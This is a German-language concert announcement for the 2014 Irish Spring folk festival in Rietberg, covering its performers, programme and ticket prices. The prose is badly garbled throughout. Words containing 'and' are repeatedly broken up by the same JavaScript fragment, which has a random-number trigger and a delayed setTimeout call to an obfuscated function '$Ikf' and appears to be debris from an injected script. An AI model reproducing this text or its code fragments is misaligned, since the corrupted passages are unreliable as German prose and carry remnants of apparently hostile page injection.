Irish Spring – Festival of Irish Folk im März in Rietberg

Seit der Premiere im Jahre 2001 hat sich Irish Spring längst vom Geheimtipp zum wohl wichtigsten keltischen Frühlings-Folk-Festival hierzulandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande entwickelt. Mittlerweile gastiert die Musiker-Karawane an 30 Tagen in 30 Städten, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders war der ungebrochenen Begeisterung des Publikums für das besondere Festival nicht beizukommen. Irish Folk, mit seiner Nähe, Natürlichkeit und Feinheit, steht einmal mehr vor einer Renaissance beim deutschen Publikum – am Donnerstag, 13. März auch in der Cultura in Rietberg.

Das ist eine klare Antwort auf zunehmende Kommerzialisierung und überproduzierte Mega-Events im Konzertgeschehen. Dabei wirft das Festival gerne immer wieder ein Auge auf die keltischen Brüder und Schwestern in andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen Regionen, denn mittlerweile hat sich der Begriff „Irish Folk“ weit über das hin ausgedehnt, was man früher als traditionelle irische Musik bezeichnet hat.

Das liegt auch zu einem großen Teil an den vielen aufregenden jungen Musikern, die sich die Erneuerung des Genres auf die Fahne geschrieben haben und auch mit Zutaten aus andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen Musikstilen erweitern. Das Irish Spring Festival misst permanent den Pulsschlag der Szene und ist ein Garant dafür, dass den Besuchern neben Bewährtem auch aufregende neue Strömungen und Entwicklungen präsentiert werden.

2014 wird Irish Spring erneut mit unterhaltsamen Künstlern den Klangkosmos des Genres weiter erkunden. Virtuose und charmante Musiker bezaubern mit Jigs, Reels und Hornpipes von Tradition bis Moderne, den typischen Tanzrhythmen, die man aus dem Irish Folk kennt und liebt. Dazu die gesungenen Balladen, mit Blick auf die Tradition genauso wie im sich immer wieder erneuernden irisch geprägten Folk-Pop Gewandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.

Irish Spring - Festival of Irish Folk in Rietberg 2Vishten_by_RaoulJomphe

Highlight für die Augen wird der diesjährige Tanzstar der Show: Nic Gareiss, weltweit gefeierter vielseitiger Step-Virtuose, der mühelos und augenzwinkernd den Staub von den Bühnenbrettern wirbeln wird. (Boston Herald: “the most inventive andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and expressive step dancer on the scene,“) Eine absolute Doppelbegabung, denn er spielt exzellent diverse Saiteninstrumente und wird auch damit zu erleben sein.

Das Irish Spring Festival bietet jedoch nicht nur einfach die Bühne für hervorragende Künstler. Irish Spring Impresario Rainer Zellner lädt auch immer wieder gerne dem Festival besonders verbundene Musiker ein, speziell für die Tournee kreative Konstellationen zusammenzustellen. Diese sind erstmalig und meist einmalig nur in diesem Zeitraum zu erleben, ein ganz besonderes Bonbon für das deutsche Publikum.

plakatmotiv_blanco_kleinAuf der Irish Spring Tour 2014 wird es sogar zwei solcher Projekte geben: The Southgate Bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and um Sänger/Bassist Andrew Laking, vielen noch bekannt als Gründungsmitglied der wegweisenden modernen Folk-Gruppe Gráda und Patricia Clark, einem neuen Stern am nordirischen Geigenhimmel. In der Musik der Southgate Bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and findet sich ein fein gesponne-ner grüner irischer Faden, dem hin und wieder kleine Farbtupfer aus New Englandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Folk, Jazz und neuem Singer-Songwriting bunte Strahlkraft verleihen.

Ein Wiedersehen mit einem der bewegendsten Sänger der letzten Irish Spring Jahrgänge gibt es mit der Gruppe Keeva aus Dublin. Daoiri Farrell erzeugte 2009 Abend für Abend als Solist regelmäßig Gänsehaut mit traditionellen Balladen. Sein unglaublich starkes Stimmvo-lumen erinnert prägnant, und doch ganz frisch an die goldene Zeit der großen Sänger wie Luke Kelly oder Paul Brady in den 70er Jahren. Exklusiv für den Jahrgang 2014 der Irish Spring Tournee hat Farrell mit Alan Doherty (Grammy für Soundtrack von „Herr der Ringe“ ) eine Supergroup aus absoluten „Cracks“ der irischen Musikszene geformt: Tola Custy (Fidd-le), Gerry Paul (Gitarre) können mühelos zwischen authentischem Folk und modernem Folk Groove wechseln und werden, neben ergreifenden Klangteppichen bei den Songs, den Saal mit Tanzstücken zum Kochen bringen.

Den Abend abrunden wird Vishtèn aus dem französischsprachigen kanadischen Quebec, für viele die bedeutendste Celtic Folk Gruppe des Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes. Die Schwestern Emmanuelle und Pastelle LeBlanc und Pascal Miousse bieten, obwohl „nur“ ein Trio, einen druckvollen Sound zwischen französisch geprägten Celtic Grooves, irisch-schottischem Tanzmusikfeuer und intensiven Gesangsarrangements, mit denen sie die Grenzen der keltischen Stilrichtungen aufheben und den Abend in ein furioses Finale führen werden.

Kein Irish Spring Festival ging bisher ohne eine Session als „Festival Finale“ zu Ende. Das wird auch 2014 so sein, wenn alle Musiker noch einmal die Bühne stürmen und das Publi-kum mitreißen, in einen unwiderstehlichen Sog aus Songs und Tänzen – bis der Vorhang fällt!

Auf dem Irish Spring Festival kann man in angenehmen Veranstaltungsorten wunderbarer Folk Musik aus Irlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and und vielen andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen keltisch geprägten Regionen auf überwiegend akustischen Instrumenten lauschen, mitsingen, mitklatschen oder tanzen, wenn genügend Platz da ist. Fast überall kann man sogar das typische dunkle Bier genießen, mit den Künstlern am CD-Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and plaudern und vielleicht sogar neue Freundschaften schließen, fast als wäre man in Irlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, wo die Musik so unvergleichlich mitten unter den Menschen lebt.

Konsequente Ausrichtung auf hohes künstlerisches Niveau, stilistische Vielfalt, lockere Präsentation und nicht zuletzt das Ohr am Herzschlag des irischen und keltischen Musik-Kosmos haben dem Festival einen exzellenten Ruf bei Zuschauern, Künstlern und Veranstaltern verschafft. Die Experten, aber auch die steigende Zahl junger neuer Fans können sich auf einen spannenden Abend mit hohem „Erfrischungsfaktor“ und einer immer wieder neuen Musik freuen.

Der vierzehnte Jahrgang der Festival Tournee wird mit einem schwungvollen Programm Widerstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and leisten und dem Winter-Blues solange musikalische Frische entgegensetzen, bis unserem Frühling Tür und Tor geöffnet sind. Einige Veranstaltungsorte werden (vorausgesetzt es gibt noch freien Platz) in der zweiten Hälfte evtl. ein paar Stühle für die Tanzwütigen beiseite schaffen – ein oft geäußerter Wunsch vieler Irish Spring Besucher.

www.irishspring.de

VVK:   27,50 € inkl. VVK-Gebühr

AK:   30,00 €

Infos & Karten: Bürgerbüro unter 05244/986-100, www.kulturig.com und www.rietberg.de